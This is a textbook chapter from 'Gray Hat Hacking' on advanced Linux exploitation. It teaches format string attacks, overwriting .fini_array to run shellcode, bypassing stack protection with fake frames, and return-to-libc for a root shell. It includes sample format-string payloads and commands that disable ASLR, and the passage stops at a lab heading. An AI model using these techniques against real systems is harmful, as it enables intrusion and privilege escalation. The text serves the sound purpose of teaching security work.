Advanced Linux Exploits - From Vulnerability to Exploit - Praise for Gray Hat Hacking: The Ethical Hacker’s Handbook, Fourth Edition (2015)

PART II. From Vulnerability to Exploit

CHAPTER 11. Advanced Linux Exploits

Now that you have the basics under your belt from reading Chapter 10, you are ready to study more advanced Linux exploits. The field is advancing constantly: hackers keep discovering new techniques, and developers keep implementing new countermeasures. No matter how you approach the problem, you need to move beyond the basics. That said, we can only go so far in this book; your journey is only beginning. The “For Further Reading” section will give you more destinations to explore.

In this chapter, we cover the following topics:

• Format string exploits

• Memory protection schemes

Format String Exploits

Format string exploits became public in late 2000. Unlike buffer overflows, format string errors are relatively easy to spot in source code and binary analysis. Once spotted, they are usually eradicated quickly. Because they are more likely to be found by automated processes, as discussed in later chapters, format string errors appear to be on the decline. That said, it is still good to have a basic understanding of them because you never know what will be found tomorrow. Perhaps you might find a new format string error!

The Problem

Format strings are found in format functions. In other words, the function may behave in many ways depending on the format string provided. Following are some of the many format functions that exist (see the “References” section for a more complete list):

printf() Prints output to the standard output stream, stdout (usually the screen)

fprintf() Prints output to a file stream

sprintf() Prints output to a string

snprintf() Prints output to a string with length checking built in

Format Strings

As you may recall from Chapter 2, the printf() function may have any number of arguments. We will discuss two forms here:

printf(<format string>, <list of variables/values>);
printf(<user supplied string>);

The first form is the most secure way to use the printf() function because the programmer explicitly specifies how the function is to behave by using a format string (a series of characters and special format tokens).

Table 11-1 introduces two more format tokens, %hn and <number>$, that may be used in a format string (the four originally listed in Table 2-4 are included for your convenience).

image

Table 11-1 Commonly Used Format Symbols

The Correct Way

Recall the correct way to use the printf() function. For example, the code

image

produces the following output:

image

The Incorrect Way

Now take a look at what happens if we forget to add a value for the %s to replace:

image

image

What was that? Looks like Greek, but actually it’s machine language (binary), shown in ASCII. In any event, it is probably not what you were expecting. To make matters worse, consider what happens if the second form of printf() is used like this:

image

If the user runs the program like this, all is well:

#gcc -o fmt3 fmt3.c
#./fmt3 Testing
Testing#

The cursor is at the end of the line because we did not use a \n newline, as before. But what if the user supplies a format string as input to the program?

#gcc -o fmt3 fmt3.c
#./fmt3 Testing%s
TestingYyy´¿y#

Wow, it appears that we have the same problem. However, it turns out this latter case is much more deadly because it may lead to total system compromise. To find out what happened here, we need to look at how the stack operates with format functions.

Stack Operations with Format Functions

To illustrate the function of the stack with format functions, we will use the following program:

image

During execution of the printf() function, the stack looks like Figure 11-1.

image

Figure 11-1 Depiction of the stack when printf() is executed

As always, the parameters of the printf() function are pushed on the stack in reverse order, as shown in Figure 11-1. The addresses of the parameter variables are used. The printf() function maintains an internal pointer that starts out pointing to the format string (or top of the stack frame) and then begins to print characters of the format string to the STDIO handle (the screen in this case) until it comes upon a special character.

If the % is encountered, the printf() function expects a format token to follow and thus increments an internal pointer (toward the bottom of the stack frame) to grab input for the format token (either a variable or absolute value). Therein lies the problem: the printf() function has no way of knowing whether the correct number of variables or values was placed on the stack for it to operate. If the programmer is sloppy and does not supply the correct number of arguments, or if the user is allowed to present their own format string, the function will happily move down the stack (higher in memory), grabbing the next value to satisfy the format string requirements. So what we saw in our previous examples was the printf() function grabbing the next value on the stack and returning it where the format token required.
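The pointer walk described above can be mimicked with a toy model. The sketch below is not how glibc implements printf(); the name toy_printf and the sample stack words are hypothetical, and only the %08x token is handled. It simply shows that each token consumes the next word, whether or not the caller supplied one.

```python
def toy_printf(fmt, stack_words):
    """Toy model of a format function: every %08x token consumes the next
    32-bit word from stack_words, whether or not the caller supplied one."""
    out = []
    next_word = 0          # index of the next argument slot to consume
    i = 0
    while i < len(fmt):
        if fmt.startswith("%08x", i):
            out.append("%08x" % stack_words[next_word])
            next_word += 1
            i += 4
        else:
            out.append(fmt[i])
            i += 1
    return "".join(out)


# Hypothetical stack contents: one intended argument, then unrelated data.
stack = [0x0000002A, 0xDEADBEEF, 0x08048000]

if __name__ == "__main__":
    print(toy_printf("value=%08x", stack))             # uses the intended argument
    print(toy_printf("value=%08x %08x %08x", stack))   # keeps reading past it
```

With one token the model prints only the intended argument; with three tokens it leaks the two neighboring words as well.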

NOTE The \ is handled by the compiler and used to escape the next character after it. This is a way to present special characters to a program and not have them interpreted literally. However, if a \x is encountered, the compiler expects a hexadecimal number to follow and converts that number into the single byte with that value before processing.

Implications

The implications of this problem are profound indeed. In the best case, the stack value may contain a random hex number that the format function interprets as an out-of-bounds address, causing the process to have a segmentation fault. An attacker could use this to create a denial-of-service condition.

In the worst case, however, a careful and skillful attacker may be able to use this fault to both read arbitrary data and write data to arbitrary addresses. In fact, if the attacker can overwrite the correct location in memory, they may be able to gain root privileges.

Example of a Vulnerable Program

For the remainder of this section, we will use the following piece of vulnerable code to demonstrate the possibilities:

image

image

NOTE The Canary value is just a placeholder for now. It is important to realize that your value will certainly be different. For that matter, your system may produce different values for all the examples in this chapter; however, the results should be the same.

Lab 11-1: Reading from Arbitrary Memory

NOTE This lab, like all of the labs, has a unique README file with instructions for setup. See the Appendix for more information.

We will now begin to take advantage of the vulnerable program. We will start slowly and then pick up speed. Buckle up, here we go!

Using the %x Token to Map Out the Stack

As shown in Table 11-1, the %x format token is used to provide a hex value. So, by supplying a few %08x tokens to our vulnerable program, we should be able to dump the stack values to the screen:

$ ./fmtstr "AAAA %08x %08x %08x %08x"
AAAA bffffd2d 00000648 00000774 41414141
Canary at 0x08049734 = 0x00000000
$

The 08 sets the field width of each hex value: every value is zero-padded to eight hex digits, which is one 4-byte word. Notice that the format string itself was stored on the stack, proven by the presence of our AAAA (0x41414141) test string. The fact that the fourth item shown (from the stack) was our format string depends on the nature of the format function used and the location of the vulnerable call in the vulnerable program. To find this value, simply use brute force and keep increasing the number of %08x tokens until the beginning of the format string is found. For our simple example (fmtstr), the distance, called the offset, is 4.
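The brute-force search for the offset is easy to automate once the dumped line is captured. The following sketch assumes the output has the shape shown above (the literal test string followed by space-separated hex words); find_offset is a hypothetical helper name.

```python
def find_offset(dump_line, marker=0x41414141):
    """Return the 1-based position of marker among the hex words printed
    after the leading test string, or None if it is not present."""
    words = dump_line.split()[1:]      # drop the literal "AAAA" prefix
    for position, word in enumerate(words, start=1):
        if int(word, 16) == marker:
            return position
    return None


if __name__ == "__main__":
    print(find_offset("AAAA bffffd2d 00000648 00000774 41414141"))
```

If the marker is not found, the caller would add more %08x tokens and try again.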

Using the %s Token to Read Arbitrary Strings

Because we control the format string, we can place anything in it we like (well, almost anything). For example, if we wanted to read the value of the address located in the fourth parameter, we could simply replace the fourth format token with %s, as shown:

$ ./fmtstr "AAAA %08x %08x %08x %s"
Segmentation fault
$

Why did we get a segmentation fault? Because, as you recall, the %s format token will take the next parameter on the stack (in this case, the fourth one) and treat it like a memory address to read from (by reference). In our case, the fourth value is AAAA, which is translated in hex to 0x41414141, which (as we saw in the previous chapter) causes a segmentation fault.

Reading Arbitrary Memory

So how do we read from arbitrary memory locations? Simple: we supply valid addresses within the segment of the current process. We will use the following helper program to assist us in finding a valid address:

image

The purpose of this program is to fetch the location of environment variables from the system. To test this program, let’s check for the location of the SHELL variable, which stores the location of the current user’s shell:

$ ./getenv SHELL
SHELL is located at 0xbffff76e

NOTE Remember to disable ASLR on current Kali versions (see the section “Address Space Layout Randomization (ASLR),” later in this chapter). Otherwise, the found address for the SHELL variable will vary and the following exercises won’t work.

Now that we have a valid memory address, let’s try it. First, remember to reverse the memory location because this system is little-endian:

image

Success! We were able to read up to the first NULL character of the address given (the SHELL environment variable). Take a moment to play with this now and check out other environment variables. To dump all environment variables for your current session, type env | more at the shell prompt.
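Reversing the address by hand is error-prone, so it can help to let a script do the byte swap. This is a small sketch using Python's standard struct module; le32 and shell_escape are hypothetical helper names, and the address is the SHELL location reported by getenv above.

```python
import struct


def le32(addr):
    """Pack a 32-bit address in little-endian byte order."""
    return struct.pack("<I", addr)


def shell_escape(data):
    r"""Render bytes as \xNN escapes suitable for the shell's printf."""
    return "".join("\\x%02x" % b for b in data)


if __name__ == "__main__":
    print(shell_escape(le32(0xbffff76e)))   # \x6e\xf7\xff\xbf
```

The escaped form is what goes inside the printf command substitution on the command line.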

Simplifying the Process with Direct Parameter Access

To make things even easier, you can access the fourth parameter from the stack by what is called direct parameter access. The #$ format token (where # is the parameter number) is used to direct the format function to jump over a number of parameters and select one directly. Here is an example:

image

Now when you use the direct parameter format token from the command line, you need to escape the $ with a \ in order to keep the shell from interpreting it. Let’s put this all to use and reprint the location of the SHELL environment variable:

image

Notice how short the format string can be now.

CAUTION The preceding format works for bash. Other shells such as tcsh require other formats, such as the following: $ ./fmtstr `printf "\x84\xfd\xff\xbf"`'%4\$s' Notice the use of a single quote on the end. To make the rest of the chapter’s examples easy, use the bash shell.

Using format string errors, we can specify formats for printf and other printing functions that can read arbitrary memory from a program. Using %x, we can print hex values in order to find parameter location in the stack. Once we know where our value is being stored, we can determine how the printf processes it. By specifying a memory location and then specifying the %s directive for that location, we cause the application to print out the string value at that location.

Using direct parameter access, we don’t have to work through the extra values on the stack. If we already know where positions are in the stack, we can access parameters using %3$s to print the third parameter or %4$s to print the fourth parameter on the stack. This will allow us to read any memory address within our application space as long as it doesn’t have null characters in the address.
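To compare the two styles side by side, the following sketch generates the token portion of the format string for a given offset. Both function names are hypothetical, and the output still needs the target address prepended and the $ escaped for the shell, as described earlier.

```python
def read_with_walk(offset):
    """Long form: step over offset-1 words with %08x, then dereference."""
    return " ".join(["%08x"] * (offset - 1) + ["%s"])


def read_with_dpa(offset):
    """Short form: select the parameter directly with <number>$."""
    return f"%{offset}$s"


if __name__ == "__main__":
    print(read_with_walk(4))   # %08x %08x %08x %s
    print(read_with_dpa(4))    # %4$s
```

The direct form stays the same length no matter how far down the stack the parameter sits.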

Lab 11-2: Writing to Arbitrary Memory

For this example, we will try to overwrite the canary address 0x08049734 with the address of shellcode (which we will store in memory for later use). We will use this address because it is visible to us each time we run fmtstr, but later we will see how we can overwrite nearly any address.

Magic Formula

As shown by Blaess, Grenier, and Raynal, the easiest way to write 4 bytes in memory is to split it up into two chunks (two high-order bytes and two low-order bytes) and then use the #$ and %hn tokens to put the two values in the right place.1

For example, let’s put our shellcode from the previous chapter into an environment variable and retrieve the location:

image

If we wish to write this value into memory, we would split it into two values:

• Two high-order bytes (HOB): 0xbfff

• Two low-order bytes (LOB): 0xff50

As you can see, in our case, HOB is less than (<) LOB, so we would follow the first column in Table 11-2.

image

Table 11-2 The Magic Formula to Calculate Your Exploit Format String

Now comes the magic. Table 11-2 presents the formula to help us construct the format string used to overwrite an arbitrary address (in our case, the canary address, 0x08049734).
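The arithmetic behind this kind of formula can be sketched in a few lines. The code below assumes the usual layout for a two-step write: the string starts with the two target addresses ([addr + 2] then [addr], 8 bytes in total), followed by a padding token and a %hn write for the smaller half, then a second padding token and %hn write for the larger half. The function name magic_format is hypothetical, and the sketch assumes the two halves differ and that each is at least 8.

```python
import struct


def magic_format(target, value, offset):
    """Return (address_bytes, tokens) for writing a 32-bit value to target
    as two 16-bit %hn writes, smaller half first."""
    hob = (value >> 16) & 0xFFFF     # two high-order bytes
    lob = value & 0xFFFF             # two low-order bytes
    if hob == lob or min(hob, lob) < 8:
        raise ValueError("sketch assumes distinct halves, each >= 8")
    # Slot `offset` points at target+2 (HOB), slot `offset+1` at target (LOB).
    addrs = struct.pack("<II", target + 2, target)
    if hob < lob:
        first, first_slot, second, second_slot = hob, offset, lob, offset + 1
    else:
        first, first_slot, second, second_slot = lob, offset + 1, hob, offset
    # The 8 address bytes are already counted as printed characters.
    tokens = (f"%.{first - 8}x%{first_slot}$hn"
              f"%.{second - first}x%{second_slot}$hn")
    return addrs, tokens


if __name__ == "__main__":
    addrs, tokens = magic_format(0x08049734, 0xbfffff50, 4)
    print(addrs.hex(), tokens)
```

For the canary address 0x08049734, the value 0xbfffff50, and an offset of 4, the padding values come out as 49143 (0xbfff minus 8) and 16209 (0xff50 minus 0xbfff).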

Using the Canary Value to Practice

Using Table 11-2 to construct the format string, let’s try to overwrite the canary value with the location of our shellcode.

CAUTION At this point, you must understand that the names of our programs (getenv and fmtstr) need to be the same length. This is because the program name is stored on the stack at startup, and therefore the two programs will have different environments (and locations of the shellcode in this case) if their names are of different lengths. If you named your programs something different, you will need to play around and account for the difference or simply rename them to the same size for these examples to work.

To construct the injection buffer to overwrite the canary address 0x08049734 with 0xbfffff50, follow the formula in Table 11-2. Values are calculated for you in the right column and used here:

image

CAUTION Once again, your values will be different. Start with the getenv program, and then use Table 11-2 to get your own values. Also, there is actually no new line between the printf and the double quote.

Using format string vulnerabilities, we can also write to memory. By following the formula in Table 11-2, we can pick memory locations within the application and overwrite their values. The table simplifies the math needed to work out which values to place in the format string so that the desired value is written to a specific memory location. This will allow us to change variable values as well as set up for more complex attacks.
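One way to sanity-check a format string before trying it is to replay its writes in a toy model. The sketch below is only a model, not the real printf(): it tracks the running count of printed characters and applies each %hn as a 16-bit little-endian store. The address bytes and tokens are an assumption derived from this lab's stated values (canary at 0x08049734, shellcode at 0xbfffff50, offset 4), and replay_hn_writes is a hypothetical name.

```python
import re
import struct


def replay_hn_writes(addr_bytes, tokens, offset):
    """Replay %.Nx padding and %<slot>$hn writes; return a dict that maps
    each written address to the byte stored there."""
    slots = struct.unpack("<II", addr_bytes)   # parameters offset, offset+1
    memory = {}
    printed = len(addr_bytes)                  # address bytes count as output
    for pad, slot in re.findall(r"%\.(\d+)x%(\d+)\$hn", tokens):
        printed += int(pad)
        dest = slots[int(slot) - offset]
        half = printed & 0xFFFF                # %hn stores only 16 bits
        memory[dest] = half & 0xFF
        memory[dest + 1] = half >> 8
    return memory


def read32(memory, addr):
    """Read a little-endian 32-bit value back out of the toy memory."""
    return int.from_bytes(bytes(memory[addr + i] for i in range(4)), "little")


if __name__ == "__main__":
    mem = replay_hn_writes(b"\x36\x97\x04\x08\x34\x97\x04\x08",
                           "%.49143x%4$hn%.16209x%5$hn", 4)
    print(hex(read32(mem, 0x08049734)))
```

If the replayed value does not match the intended shellcode address, one of the padding values or slot numbers is off.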

Lab 11-3: Changing Program Execution

Okay, so what? We can overwrite a staged canary value…big deal. It is a big deal because some locations are executable and, if overwritten, may lead to system redirection and execution of your shellcode. We will look at one of many such locations, called .fini_array.

ELF32 File Format

When the GNU compiler creates binaries, they are stored in ELF32 file format. This format allows for many tables to be attached to the binary. Among other things, these tables are used to store pointers to functions the file may need often. There are two tools you may find useful when dealing with binary files:

nm Used to list the symbols in the ELF32 format file, along with their addresses

objdump Used to dump and examine the individual sections of the file

Let’s start with the nm tool:

image

And to view a section (say, .comment), you would simply use the objdump tool:

image

FINI_ARRAY Section

In C/C++, the fini_array section provides a list of functions to run when an application ends. This is used to help an application clean up data or do other processing that may be desired when an application ends. For example, if you wanted to print a message every time the program exited, you would use a destructor. The fini_array section is stored in the binary itself, and can be seen by using nm and objdump.

Let’s take a look at a modified version of fmtstr.c that uses a destructor to show where the canary is:

image

We have modified the program to use a destructor to print the canary value. This is done by defining checkCanary with a destructor attribute, and then creating the new function in the program. Now instead of printing the canary value out in the main function, it will print when the program ends.

Let’s explore the nm and objdump output. To start, nm will allow us to dump the symbols. We are looking for the fini_array element that holds the destructors (dtors).

image

We see here that our fini_array entry is at 0x08049634. Next, we would want to see what functions are being called. To do this, we can use objdump. This will dump information about the fini_array section for us.

image

Here, we can see that the section shows the address of the fini_array. This value matches up with what we saw from our nm output. Next, there are two functions in the array. The addresses of the two functions can be seen after the location of the array. These are in little-endian byte order (reverse order). Now we can use nm to determine which functions these addresses point to:

$ nm ./fmtstr | grep -e 08048430 -e 080484ba
08048430 t __do_global_dtors_aux
080484ba t checkCanary

We can see from here that two destructors are called when the program exits. One is the __do_global_dtors_aux function and the other is the checkCanary function.
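Decoding the little-endian words by hand is a common source of mistakes, so here is a small sketch that does it. The hex words passed in are an assumption: they are the byte-swapped forms of the two nm addresses above, which is how an objdump -s style dump would show them. decode_pointer_array is a hypothetical helper name.

```python
import struct


def decode_pointer_array(section_addr, hex_words):
    """Turn a hex dump of a pointer array into (slot address, pointer) pairs."""
    raw = bytes.fromhex(hex_words.replace(" ", ""))
    count = len(raw) // 4
    pointers = struct.unpack("<%dI" % count, raw)   # little-endian 32-bit
    return [(section_addr + 4 * i, ptr) for i, ptr in enumerate(pointers)]


if __name__ == "__main__":
    for slot, ptr in decode_pointer_array(0x08049634, "30840408 ba840408"):
        print(hex(slot), "->", hex(ptr))
```

Each slot address in the result is a candidate location for a function pointer overwrite.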

Putting It All Together

Now back to our vulnerable format string program, fmtstr.

It turns out that if we overwrite an existing function pointer in the fini_array section with our target return address (in this case, our shellcode address), the program will happily jump to that location and execute. To get the first pointer location or the end marker, simply add 4 bytes to the fini_array location. In our case, this is

0x8049634 + 4 = 0x8049638

which goes in our second memory slot, bolded in the following code.

Follow the same first column of Table 11-2 to calculate the required format string to overwrite the new memory address 0x08049638 with the address of the shellcode: 0xbffffe3f in our case. Here goes:

image

image

Success! Relax, you earned it.

There are many other useful locations to overwrite. Here are some examples:

• The global offset table

• Global function pointers

• The atexit handlers

• Stack values

• Program-specific authentication variables

And there are many more; see “For Further Reading” for more ideas.

Leveraging format string weaknesses, we have the ability to overwrite memory, including function pointers. By using the techniques from Lab 11-2 along with the destructors inherent to a binary, we can alter application flow. By putting shellcode into an environment variable and identifying the location of that shellcode, we know where the application should be diverted to. Using the format string vulnerability in the printf() call, we can write that address into the .fini_array section so that the shellcode is executed when the application exits.

Memory Protection Schemes

Since buffer overflows and heap overflows have come to be, many programmers have developed memory protection schemes to prevent these attacks. As you will see, some work, some don’t.

Compiler Improvements

Several improvements have been made to the gcc compiler, starting in GCC 4.1.

Libsafe

Libsafe is a dynamic library that allows for the safer implementation of the following dangerous functions:

strcpy()

strcat()

sprintf(), vsprintf()

getwd()

gets()

realpath()

fscanf(), scanf(), sscanf()

Libsafe overrides these dangerous libc functions with implementations that add bounds checking and input scrubbing, thereby eliminating most stack-based attacks. However, there is no protection offered against the heap-based exploits described in this chapter.

StackShield, StackGuard, and Stack Smashing Protection (SSP)

StackShield is a replacement to the gcc compiler that catches unsafe operations at compile time. Once it’s installed, the user simply issues shieldgcc instead of gcc to compile programs. In addition, when a function is called, StackShield copies the saved return address to a safe location and restores the return address upon returning from the function.

StackGuard was developed by Crispin Cowan of Immunix.com and is based on a system of placing “canaries” between the stack buffers and the frame state data. If a buffer overflow attempts to overwrite saved eip, the canary will be damaged and a violation will be detected.
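The canary idea can be illustrated with a toy frame. This sketch is a simplified model, not StackGuard's actual implementation: the frame layout ([buffer][canary][saved return address]), the canary value, and all function names are hypothetical.

```python
import struct

CANARY = b"\x00\x0a\xff\x0d"   # hypothetical terminator-style canary value


def build_frame(buf_size, saved_ret):
    """Lay out [buffer][canary][saved return address], low to high."""
    return bytearray(buf_size) + CANARY + struct.pack("<I", saved_ret)


def unchecked_copy(frame, data):
    """Mimic an unbounded copy into the buffer at the start of the frame."""
    frame[0:len(data)] = data


def canary_intact(frame, buf_size):
    """The check a protected epilog would make before returning."""
    return bytes(frame[buf_size:buf_size + 4]) == CANARY


if __name__ == "__main__":
    frame = build_frame(8, 0x08048abc)
    unchecked_copy(frame, b"A" * 8)
    print(canary_intact(frame, 8))    # input fits in the buffer
    unchecked_copy(frame, b"A" * 12 + struct.pack("<I", 0xbffffe3f))
    print(canary_intact(frame, 8))    # overflow ran through the canary
```

Because the canary sits between the buffer and the saved return address, a linear overflow cannot reach the return address without damaging it first.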

Stack Smashing Protection (SSP), formerly called ProPolice, is now developed by Hiroaki Etoh of IBM and improves on the canary-based protection of StackGuard by rearranging the stack variables to make them more difficult to exploit. In addition, a new prolog and epilog are implemented with SSP.

The following is the previous prolog:

image

As shown in Figure 11-2, a pointer is provided to ArgC and checked after the return of the application, so the key is to control that pointer to ArgC, instead of saved Ret.

image

Figure 11-2 Old and new prolog

Because of this new prolog, a new epilog is created:

image

Lab 11-4: Bypassing Stack Protection

Back in Chapter 10, we discussed how to handle overflows of small buffers by using the end of the environment segment of memory. Now that we have a new prolog and epilog, we need to insert a fake frame, including a fake Ret and fake ArgC, as shown in Figure 11-3.

image

Figure 11-3 Using a fake frame to attack small buffers

Using this fake frame technique, we can control the execution of the program by jumping to the fake ArgC, which will use the fake Ret address (the actual address of the shellcode). The source code of such an attack follows:

image

NOTE The preceding code actually works for both cases, with and without stack protection on. This is a coincidence, due to the fact that it takes 4 bytes less to overwrite the pointer to ArgC than it did to overwrite saved Ret under the previous way of performing buffer overflows.

The preceding code can be executed as follows:

image

SSP has been incorporated in GCC (starting in version 4.1) and is on by default. It may be disabled with the -fno-stack-protector flag, and it can be forced by using -fstack-protector-all.

You may check for the use of SSP by using the objdump tool:

image

Notice the call to the __stack_chk_fail@plt function, compiled into the binary.

NOTE As implied by their names, none of the tools described in this section offers any protection against heap-based attacks.

Non-Executable Stack (GCC Based)

GCC has implemented a non-executable stack, using the GNU_STACK ELF markings. This feature is on by default (starting in version 4.1) and may be disabled with the -z execstack flag, as shown here:

image

Notice that in the first command the RW flag is set in the ELF markings, and in the second command (with the -z execstack flag) the RWE flag is set in the ELF markings. The flags stand for read (R), write (W), and execute (E).
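The same marking can be read programmatically. The following sketch parses the program headers of a little-endian ELF32 image and reports the flags on the PT_GNU_STACK entry. The constants and field offsets come from the ELF format; the function name gnu_stack_flags is hypothetical, and ELF64 or big-endian files are deliberately not handled.

```python
import struct

PT_GNU_STACK = 0x6474E551        # program header type for the stack marking
PF_X, PF_W, PF_R = 0x1, 0x2, 0x4


def gnu_stack_flags(elf):
    """Return 'RW', 'RWE', etc. for the GNU_STACK header, or None if absent."""
    if elf[:4] != b"\x7fELF" or elf[4] != 1 or elf[5] != 1:
        raise ValueError("expected a little-endian ELF32 image")
    (e_phoff,) = struct.unpack_from("<I", elf, 28)
    e_phentsize, e_phnum = struct.unpack_from("<HH", elf, 42)
    for i in range(e_phnum):
        base = e_phoff + i * e_phentsize
        (p_type,) = struct.unpack_from("<I", elf, base)
        if p_type == PT_GNU_STACK:
            (p_flags,) = struct.unpack_from("<I", elf, base + 24)
            return "".join(ch for bit, ch in
                           ((PF_R, "R"), (PF_W, "W"), (PF_X, "E"))
                           if p_flags & bit)
    return None
```

A typical use would be gnu_stack_flags(open(path, "rb").read()), where path names a 32-bit binary; a result containing E means the stack is marked executable.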

In this lab, we looked at how to determine if stack protections are in place as well as how to bypass them. Using a fake frame, we can get our shellcode to execute by controlling where the application returns.

Kernel Patches and Scripts

Although many protection schemes are introduced by kernel-level patches and scripts, we will mention only a few of them here.

Non-Executable Memory Pages (Stacks and Heaps)

Early on, developers realized that program stacks and heaps should not be executable and that user code should not be writable once it is placed in memory. Several implementations have attempted to achieve these goals.

The Page-eXec (PaX) patches attempt to provide execution control over the stack and heap areas of memory by changing the way memory paging is done. Normally, a page table entry (PTE) exists for keeping track of the pages of memory and caching mechanisms called data and instruction translation look-aside buffers (TLBs). The TLBs store recently accessed memory pages and are checked by the processor first when accessing memory. If the TLB caches do not contain the requested memory page (a cache miss), then the PTE is used to look up and access the memory page.

The PaX patch implements a set of state tables for the TLB caches and maintains whether a memory page is in read/write mode or execute mode. As the memory pages transition from read/write mode into execute mode, the patch intervenes, logging and then killing the process making this request. PaX has two methods to accomplish non-executable pages. The SEGMEXEC method is faster and more reliable, but splits the user space in half to accomplish its task. When needed, PaX uses a fallback method, PAGEEXEC, which is slower but also very reliable.

Red Hat Enterprise Server and Fedora offer the ExecShield implementation of non-executable memory pages. Although quite effective, it has been found to be vulnerable under certain circumstances and to allow data to be executed.

Address Space Layout Randomization (ASLR)

The intent of ASLR is to randomize the following memory objects:

• Executable image

• brk()-managed heap

• Library images

• mmap()-managed heap

• User space stack

• Kernel space stack

PaX, in addition to providing non-executable pages of memory, fully implements the preceding ASLR objectives. grsecurity (a collection of kernel-level patches and scripts) incorporates PaX and has been merged into many versions of Linux. Red Hat and Fedora use a Position Independent Executable (PIE) technique to implement ASLR. This technique offers less randomization than PaX, although they protect the same memory areas. Systems that implement ASLR provide a high level of protection from “return into libc” exploits by randomizing the way the function pointers of libc are called. This is done through the randomization of the mmap() system call and makes finding the pointer to system() and other functions nearly impossible. However, using brute-force techniques to find function calls such as system() is possible.

On Debian- and Ubuntu-based systems, the following command can be used to disable ASLR:

root@quazi(/tmp):# echo 0 > /proc/sys/kernel/randomize_va_space
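Before running the labs, it is worth confirming what the setting actually is. The sketch below reads the same /proc file and translates the value using the meanings given in the Linux kernel's sysctl documentation (0, 1, and 2); the function names are hypothetical.

```python
ASLR_MODES = {
    0: "disabled",
    1: "stack, mmap base, and vDSO randomized",
    2: "as 1, plus brk()-managed heap randomized",
}


def describe_aslr(raw):
    """Translate the text read from randomize_va_space into a description."""
    return ASLR_MODES.get(int(raw.strip()), "unknown")


def read_aslr(path="/proc/sys/kernel/randomize_va_space"):
    """Read the current setting from the running kernel (Linux only)."""
    with open(path) as handle:
        return describe_aslr(handle.read())
```

Calling read_aslr() on the lab machine should report "disabled" after the preceding command has been run as root.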

On Red Hat–based systems, the following commands can be used to disable ASLR:

root@quazi(/tmp):# echo 0 > /proc/sys/kernel/exec-shield
root@quazi(/tmp):# echo 0 > /proc/sys/kernel/exec-shield-randomize

Lab 11-5: Return to libc Exploits

“Return to libc” is a technique that was developed to get around non-executable stack memory protection schemes such as PaX and ExecShield. Basically, the technique uses the controlled eip to return execution into existing glibc functions instead of shellcode. Remember, glibc is the ubiquitous library of C functions used by all programs. The library has functions such as system() and exit(), both of which are valuable targets. Of particular interest is the system() function, which is used to run programs on the system. All you need to do is munge (shape or change) the stack to trick the system() function into calling a program of your choice, say /bin/sh.

To make the proper system() function call, we need our stack to look like this:

image

We will overflow the vulnerable buffer and exactly overwrite the old saved eip with the address of the glibc system() function. When our vulnerable main() function returns, the program will return into the system() function as this value is popped off the stack into the eip register and executed. At this point, the system() function will be entered and the system() prolog will be called, which will build another stack frame on top of the position marked “Filler,” which for all intents and purposes will become our new saved eip (to be executed after the system() function returns). Now, as you would expect, the arguments for the system() function are located just below the newly saved eip (marked “Filler” in the diagram). Because the system() function is expecting one argument (a pointer to the string of the filename to be executed), we will supply the pointer of the string “/bin/sh” at that location. In this case, we don’t actually care what we return to after the system function executes. If we did care, we would need to be sure to replace Filler with a meaningful function pointer such as exit().
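The stack layout just described translates directly into a byte string. This sketch assumes a 32-bit little-endian target and an overflow delivered through a C string copy (so NUL bytes would truncate it); the function name, the padding length, and the addresses used in the example call are all hypothetical placeholders.

```python
import struct


def ret2libc_payload(pad_len, system_addr, binsh_addr, after_system=0x42424242):
    """Build [padding][system()][filler / next return][pointer to "/bin/sh"]."""
    payload = b"A" * pad_len + struct.pack(
        "<III", system_addr, after_system, binsh_addr)
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte; a string copy would stop there")
    return payload


if __name__ == "__main__":
    # Placeholder addresses; real ones come from inspecting the target process.
    print(ret2libc_payload(28, 0xb7ed5790, 0xb7fb74bf).hex())
```

Passing the address of exit() as after_system gives the variant in which the program terminates cleanly after system() returns.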

NOTE Stack randomization makes these types of attacks very hard (not impossible) to do. Basically, brute force needs to be used to guess the addresses involved, which greatly reduces your odds of success. As it turns out, the randomization varies from system to system and is not truly random.

Let’s look at an example. Start by turning off stack randomization:

# echo 0 > /proc/sys/kernel/randomize_va_space

Take a look at the following vulnerable program:

image

As you can see, this program is vulnerable due to the strcpy() call that copies argv[1] into the small buffer. Compile the vulnerable program, set it as SUID, and return to a normal user account:

image

Now we are ready to build the “return to libc” exploit and feed it to the vuln2 program. We need the following items to proceed:

• Address of glibc system() function

• Address of the string “/bin/sh”

It turns out that functions like system() and exit() are automatically linked into binaries by the gcc compiler. To observe this fact, start the program with gdb in quiet mode. Set a breakpoint on main() and then run the program. When the program halts on the breakpoint, print the locations of the glibc function called system().

image

Another cool way to get the locations of functions and strings in a binary is by searching the binary with a custom program, as follows:

image

image

The preceding program uses the dlopen() and dlsym() functions to handle objects and symbols located in the binary. Once the system() function is located, the memory is searched in both directions, looking for the existence of the “/bin/sh” string. The “/bin/sh” string can be found embedded in glibc and keeps the attacker in this case from depending on access to environment variables to complete the attack. Finally, the value is checked to see if it contains a NULL byte and the location is printed. You may customize the preceding program to look for other objects and strings. Let’s compile the preceding program and test-drive it:

image

A quick check of the preceding gdb value shows the same location for the system() function: success!
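The search-and-check logic can also be expressed over a captured memory image. The sketch below is not the chapter's search program: it works on a bytes object rather than live process memory, and locate_string, the image, and the base addresses in the example are hypothetical. It does follow the same two steps, though: find the string, then reject any address containing a NUL byte.

```python
def locate_string(image, base, needle=b"/bin/sh\x00"):
    """Return the first address of needle whose 32-bit little-endian
    encoding has no NUL byte, or None if there is no such address."""
    start = 0
    while True:
        idx = image.find(needle, start)
        if idx < 0:
            return None
        addr = base + idx
        if b"\x00" not in addr.to_bytes(4, "little"):
            return addr
        start = idx + 1      # unusable address; keep looking


if __name__ == "__main__":
    image = b"\x90" * 0x10 + b"/bin/sh\x00" + b"\x90" * 8
    print(hex(locate_string(image, 0xb7fb7400)))
```

An address with an embedded NUL is skipped because it could not be delivered through a string-based overflow.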

We now have everything required to successfully attack the vulnerable program using the “return to libc” exploit. Putting it all together, we see this:

image

Notice that we got a shell that is euid root, and when we exited from the shell, we got a segmentation fault. Why did this happen? The program crashed when we left the user-level shell because the filler we supplied (0x42424242) became the saved eip to be executed after the system() function. So, a crash was the expected behavior when the program ended. To avoid that crash, we will simply supply the pointer to the exit() function in that filler location:

image

Congratulations, we now have a shell with the effective uid (euid) of root.

Using “return to libc” (ret2libc), we have the ability to direct application flow to other parts of the binary. By loading the stack with return paths and options to functions, when we overwrite EIP, we can direct the application flow to other parts of the application. Because we’ve loaded the stack with valid return locations and data locations, the application won’t know it has been diverted, allowing us to leverage these techniques to launch our shell.

Lab 11-6: Maintaining Privileges With ret2libc

